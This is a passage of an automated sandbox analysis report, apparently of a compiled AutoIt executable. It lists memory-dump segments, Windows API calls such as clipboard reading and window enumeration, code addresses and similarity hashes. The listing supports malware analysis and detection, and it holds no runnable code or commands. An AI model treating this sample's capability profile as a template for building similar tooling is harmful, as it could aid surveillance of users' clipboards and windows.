          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CloseConnectCreateRegistry
          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
          • API String ID: 3217815495-966354055
          • Opcode ID: fe612fbb25b3f6128ed64314c3b3c0bb99101fbb03abce9d4278d7534690164c
          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
          • Opcode Fuzzy Hash: fe612fbb25b3f6128ed64314c3b3c0bb99101fbb03abce9d4278d7534690164c
          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
          APIs
          • GetCursorPos.USER32(?), ref: 004566AE
          • GetDesktopWindow.USER32 ref: 004566C3
          • GetWindowRect.USER32(00000000), ref: 004566CA
          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
          • DestroyWindow.USER32 ref: 00456746
          • CreateWindowExW.USER32 ref: 00456794
          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
          • IsWindowVisible.USER32(?), ref: 0045682C
          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
          • GetWindowRect.USER32(?,?), ref: 00456873
          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
          • CopyRect.USER32(?,?), ref: 004568BE
          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
          • String ID: ($,$tooltips_class32
          • API String ID: 225202481-3320066284
          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
          APIs
          • _wcslen.LIBCMT ref: 00454EB0
          • _wcslen.LIBCMT ref: 00454EC3
          • __wcsicoll.LIBCMT ref: 00454ED0
          • _wcslen.LIBCMT ref: 00454EE4
          • __wcsicoll.LIBCMT ref: 00454EF1
          • _wcslen.LIBCMT ref: 00454F05
          • __wcsicoll.LIBCMT ref: 00454F12
            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
          • LoadImageW.USER32 ref: 00454F48
          • LoadLibraryExW.KERNEL32(?,00000000,00000032), ref: 00454F5B
          • LoadImageW.USER32 ref: 00454F9B
          • LoadImageW.USER32 ref: 00454FE5
          • LoadImageW.USER32 ref: 00455016
          • FreeLibrary.KERNEL32(?,?), ref: 00455023
          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0045507D
          • DestroyIcon.USER32(?), ref: 0045508B
          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004550A8
          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004550B4
          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004550D9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
          • String ID: .dll$.exe$.icl
          • API String ID: 2511167534-1154884017
          • Opcode ID: b375f9f1c060e8dc6bc6b77497d5ee60ef8e4d255dc939bc4899f3b4511c0762
          • Instruction ID: 15f67b2365a9f585a2e114aae537e2d642ac99032f03718e2682cba1ccb7e1e2
          • Opcode Fuzzy Hash: b375f9f1c060e8dc6bc6b77497d5ee60ef8e4d255dc939bc4899f3b4511c0762
          • Instruction Fuzzy Hash: 1C71B571500704BAEB10DF64DD95BFF73A8AF44B06F00881EFE45D6182E7B9A988C769
          APIs
          • OpenClipboard.USER32(?), ref: 0046DCE7
          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
          • GetClipboardData.USER32 ref: 0046DD01
          • CloseClipboard.USER32 ref: 0046DD0D
          • GlobalLock.KERNEL32 ref: 0046DD37
          • CloseClipboard.USER32 ref: 0046DD41
          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
          • GetClipboardData.USER32 ref: 0046DD8D
          • CloseClipboard.USER32 ref: 0046DD99
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
          • String ID:
          • API String ID: 15083398-0
          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
          APIs
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • GetWindowRect.USER32(?,?), ref: 00471CF7
          • GetClientRect.USER32 ref: 00471D05
          • GetSystemMetrics.USER32 ref: 00471D0D
          • GetSystemMetrics.USER32 ref: 00471D20
          • GetSystemMetrics.USER32 ref: 00471D42
          • SystemParametersInfoW.USER32 ref: 00471D71
          • GetSystemMetrics.USER32 ref: 00471D79
          • SystemParametersInfoW.USER32 ref: 00471DA3
          • GetSystemMetrics.USER32 ref: 00471DAB
          • GetSystemMetrics.USER32 ref: 00471DCF
          • SetRect.USER32 ref: 00471DEE
          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
          • CreateWindowExW.USER32 ref: 00471E35
          • SetWindowLongW.USER32 ref: 00471E6E
          • GetClientRect.USER32 ref: 00471E8A
          • GetStockObject.GDI32(00000011), ref: 00471EA6
          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
          • String ID: @$AutoIt v3 GUI
          • API String ID: 867697134-3359773793
          • Opcode ID: 48ca0162965858cd8a7d90b4edfd9160f5d84a9b714a36b67012b00fa99b22f2
          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
          • Opcode Fuzzy Hash: 48ca0162965858cd8a7d90b4edfd9160f5d84a9b714a36b67012b00fa99b22f2
          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
          • API String ID: 1503153545-1459072770
          • Opcode ID: 350bd9735680c1f2fe6b61cc20051d0bed5ab29b5e399f50cf1dd5ec93e4b896
          • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
          • Opcode Fuzzy Hash: 350bd9735680c1f2fe6b61cc20051d0bed5ab29b5e399f50cf1dd5ec93e4b896
          • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicoll$__wcsnicmp
          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
          • API String ID: 790654849-32604322
          • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
          • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1f95721b2411f0602127a86599399d4c00e63c6627d7b0ddc3b146470b6fe1f2
          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
          • Opcode Fuzzy Hash: 1f95721b2411f0602127a86599399d4c00e63c6627d7b0ddc3b146470b6fe1f2
          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
          APIs
          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window
          • String ID: 0
          • API String ID: 2353593579-4108050209
          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
          APIs
          • GetSysColor.USER32 ref: 0044A05E
          • GetClientRect.USER32 ref: 0044A0D1
          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
          • GetWindowDC.USER32(?), ref: 0044A0F6
          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
          • ReleaseDC.USER32(?,?), ref: 0044A11B
          • GetSysColor.USER32 ref: 0044A131
          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
          • GetSysColor.USER32 ref: 0044A14F
          • GetSysColor.USER32 ref: 0044A15B
          • GetWindowDC.USER32(?), ref: 0044A1BE
          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
          • ReleaseDC.USER32(?,00000000), ref: 0044A229
          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
          • GetSysColor.USER32 ref: 0044A265
          • SetTextColor.GDI32(?,00000000), ref: 0044A270
          • SetBkMode.GDI32(?,00000001), ref: 0044A282
          • GetStockObject.GDI32(00000005), ref: 0044A28A
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
          • String ID:
          • API String ID: 1744303182-0
          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
          APIs
          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
          • __mtterm.LIBCMT ref: 00417C34
            • Part of subcall function 004178FF: TlsFree.KERNEL32(0000001E,00417D96,?,004164DE), ref: 0041792A
            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(0000001E,00410E44,?,00417D96,?,004164DE), ref: 004181E2
          • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,004164DE), ref: 00417C4A
          • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,004164DE), ref: 00417C57
          • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,004164DE), ref: 00417C64
          • GetProcAddress.KERNEL32(00000000,FlsFree,?,004164DE), ref: 00417C71
          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
          • __init_pointers.LIBCMT ref: 00417CE6
          • __calloc_crt.LIBCMT ref: 00417D54
          • GetCurrentThreadId.KERNEL32(?,004164DE), ref: 00417D80
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
          • API String ID: 4163708885-3819984048
          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
          APIs
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • GetForegroundWindow.USER32 ref: 0046EE79
          • GetForegroundWindow.USER32 ref: 0046F265
          • IsWindow.USER32(?), ref: 0046F29A
          • GetDesktopWindow.USER32 ref: 0046F356
          • EnumChildWindows.USER32 ref: 0046F35D
          • EnumWindows.USER32(0046130D,?), ref: 0046F365
            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
          • API String ID: 329138477-1919597938
          • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
          • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
          • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
          • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
          APIs
          • GetLocalTime.KERNEL32(?), ref: 0045DFE5
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DFF5
          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045E001
          • _wcsncpy.LIBCMT ref: 0045E020
          • __wsplitpath.LIBCMT ref: 0045E065
          • _wcscat.LIBCMT ref: 0045E07D
          • _wcscat.LIBCMT ref: 0045E08F
          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045E0A4
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E0B8
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E0F6
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E10C
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E11E
          • _wcscpy.LIBCMT ref: 0045E12A
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E170
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
          • String ID: *.*
          • API String ID: 3201719729-438819550
          • Opcode ID: 612d0aa1c8c7c3373b4edbc4901ebe84a50649513b24f47858cd2f2885e1490f
          • Instruction ID: 7dcc6d5f32d0a9fc1f1ff7e746cf1f91f269f34358fad58ace0a68446733b78c
          • Opcode Fuzzy Hash: 612d0aa1c8c7c3373b4edbc4901ebe84a50649513b24f47858cd2f2885e1490f
          • Instruction Fuzzy Hash: 296199725043009BD724EF61D981E9FB3E9AFC4315F004D1EF98A87241DB79E949CBA6
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicoll$IconLoad
          • String ID: blank$info$question$stop$warning
          • API String ID: 2485277191-404129466
          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
